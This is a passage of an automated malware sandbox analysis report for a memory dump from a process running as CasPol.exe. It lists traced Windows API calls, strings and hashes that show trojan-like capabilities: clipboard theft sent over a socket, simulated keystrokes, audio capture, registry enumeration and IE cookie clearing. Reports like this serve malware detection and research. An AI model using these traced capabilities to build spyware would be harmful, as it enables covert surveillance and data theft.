                                                                                                                      • Opcode Fuzzy Hash: 8724f9862cb7656745f569b65e9253ef66bccdbbb21ca01ab506061567e91e9c
                                                                                                                      • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                                                                                                                      APIs
                                                                                                                      • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E13,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BE6
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C69
                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00452CA1
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E13,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CFC
                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00452D4B
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D13
                                                                                                                        • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D8F
                                                                                                                      • __freea.LIBCMT ref: 00452DBA
                                                                                                                      • __freea.LIBCMT ref: 00452DC6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 201697637-0
                                                                                                                      • Opcode ID: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                                                      • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                                                                                                                      • Opcode Fuzzy Hash: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                                                      • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                                        • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                        • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                                        • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 004446B3
                                                                                                                      • _free.LIBCMT ref: 00444724
                                                                                                                      • _free.LIBCMT ref: 0044473D
                                                                                                                      • _free.LIBCMT ref: 0044476F
                                                                                                                      • _free.LIBCMT ref: 00444778
                                                                                                                      • _free.LIBCMT ref: 00444784
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                      • String ID: C
                                                                                                                      • API String ID: 1679612858-1037565863
                                                                                                                      • Opcode ID: 4ee3c7c2bc2adc8e7b8f5f7d65043758b13cb49f9f14cb5bf46d27c87fe2b158
                                                                                                                      • Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
                                                                                                                      • Opcode Fuzzy Hash: 4ee3c7c2bc2adc8e7b8f5f7d65043758b13cb49f9f14cb5bf46d27c87fe2b158
                                                                                                                      • Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: tcp$udp
                                                                                                                      • API String ID: 0-3725065008
                                                                                                                      • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                      • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                                                                                                                      • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                      • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                      • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                        • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                        • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                      • String ID: .part
                                                                                                                      • API String ID: 1303771098-3499674018
                                                                                                                      • Opcode ID: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                                                                                                                      • Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
                                                                                                                      • Opcode Fuzzy Hash: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                                                                                                                      • Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                        • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                        • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                        • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                      • _wcslen.LIBCMT ref: 0041A906
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                                      • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                      • API String ID: 37874593-703403762
                                                                                                                      • Opcode ID: 27895bcfed94204bcab943ef82ac12f5f5e023aa0cf9efce9513ccb574d3e45a
                                                                                                                      • Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
                                                                                                                      • Opcode Fuzzy Hash: 27895bcfed94204bcab943ef82ac12f5f5e023aa0cf9efce9513ccb574d3e45a
                                                                                                                      • Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D574,0043D574,?,?,?,00449BB1,00000001,00000001,1AE85006), ref: 004499BA
                                                                                                                      • __alloca_probe_16.LIBCMT ref: 004499F2
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BB1,00000001,00000001,1AE85006,?,?,?), ref: 00449A40
                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00449AD7
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                                                                                                                      • __freea.LIBCMT ref: 00449B47
                                                                                                                        • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                                                                                                      • __freea.LIBCMT ref: 00449B50
                                                                                                                      • __freea.LIBCMT ref: 00449B75
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3864826663-0
                                                                                                                      • Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                                                      • Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
                                                                                                                      • Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                                                      • Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668
                                                                                                                      APIs
                                                                                                                      • SendInput.USER32 ref: 00418B18
                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                                                                                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                                                                                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                                                                                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                                                                                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                                                                                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                                                                                                                        • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InputSend$Virtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1167301434-0
                                                                                                                      • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                      • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                                                                                                                      • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                      • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                                                                                                                      APIs
                                                                                                                      • OpenClipboard.USER32 ref: 00415A46
                                                                                                                      • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                      • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                      • OpenClipboard.USER32 ref: 00415A61
                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                      • CloseClipboard.USER32 ref: 00415A89
                                                                                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2172192267-0
                                                                                                                      • Opcode ID: efbd044eff29c5abb4193f117459f8b4416f238a5e319341b58a3d79a3577e2f
                                                                                                                      • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                                                                                                                      • Opcode Fuzzy Hash: efbd044eff29c5abb4193f117459f8b4416f238a5e319341b58a3d79a3577e2f
                                                                                                                      • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __freea$__alloca_probe_16
                                                                                                                      • String ID: a/p$am/pm$fD
                                                                                                                      • API String ID: 3509577899-1143445303
                                                                                                                      • Opcode ID: a9dc0d208de5fd7d1fb00aaf9429c157d058a6ef8680621eaae3a775435586b8
                                                                                                                      • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                                                                                                                      • Opcode Fuzzy Hash: a9dc0d208de5fd7d1fb00aaf9429c157d058a6ef8680621eaae3a775435586b8
                                                                                                                      • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00447ECC
                                                                                                                      • _free.LIBCMT ref: 00447EF0
                                                                                                                      • _free.LIBCMT ref: 00448077
                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                                                                                      • _free.LIBCMT ref: 00448243
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 314583886-0
                                                                                                                      • Opcode ID: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
                                                                                                                      • Instruction ID: 19e3b7565c7c288d74bc5d2e619305edf95ef22548e2b541e8d8082bcdfeb5ac
                                                                                                                      • Opcode Fuzzy Hash: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
                                                                                                                      • Instruction Fuzzy Hash: 27C10671904205ABFB24DF698C41AAE7BB9EF45314F2441AFE484A7251EB388E47C758
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 269201875-0
                                                                                                                      • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                                                      • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                                                                                                                      • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                                                      • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                                                                                                      • _free.LIBCMT ref: 00444096
                                                                                                                      • _free.LIBCMT ref: 004440AD
                                                                                                                      • _free.LIBCMT ref: 004440CC
                                                                                                                      • _free.LIBCMT ref: 004440E7
                                                                                                                      • _free.LIBCMT ref: 004440FE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$AllocateHeap
                                                                                                                      • String ID: Z7D
                                                                                                                      • API String ID: 3033488037-2145146825
                                                                                                                      • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                                      • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                                                                                                                      • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                                      • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                                                                                                                      APIs
                                                                                                                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A115
                                                                                                                      • __fassign.LIBCMT ref: 0044A190
                                                                                                                      • __fassign.LIBCMT ref: 0044A1AB
                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1D1
                                                                                                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1324828854-0
                                                                                                                      • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                      • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                                                                                                                      • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                      • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                                                                                                                      APIs
                                                                                                                      • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                        • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                                        • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                                      • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                        • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                      • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                        • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                                        • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                      • String ID: T=G$>G$>G
                                                                                                                      • API String ID: 1596592924-1617985637
                                                                                                                      • Opcode ID: a544d0f604bfa20063d13062b7b3f0a692fa5257fc001f001da1a660e159a4e3
                                                                                                                      • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                                                                                                                      • Opcode Fuzzy Hash: a544d0f604bfa20063d13062b7b3f0a692fa5257fc001f001da1a660e159a4e3
                                                                                                                      • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                        • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                        • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                      • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                      • String ID: TUFTUF$>G$DG$DG
                                                                                                                      • API String ID: 3114080316-344394840
                                                                                                                      • Opcode ID: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
                                                                                                                      • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                                                                                                                      • Opcode Fuzzy Hash: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
                                                                                                                      • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                      APIs
                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00437B51
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                      • String ID: csm
                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                      • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                      • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                                                                                                                      • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                      • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                        • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                        • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                      • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                      • API String ID: 1133728706-4073444585
                                                                                                                      • Opcode ID: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
                                                                                                                      • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                                                                                                                      • Opcode Fuzzy Hash: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
                                                                                                                      • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6a5ef57456b0df346b0486265a01e48adde46d03de536ae14a187a8f4c9f433e
                                                                                                                      • Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
                                                                                                                      • Opcode Fuzzy Hash: 6a5ef57456b0df346b0486265a01e48adde46d03de536ae14a187a8f4c9f433e
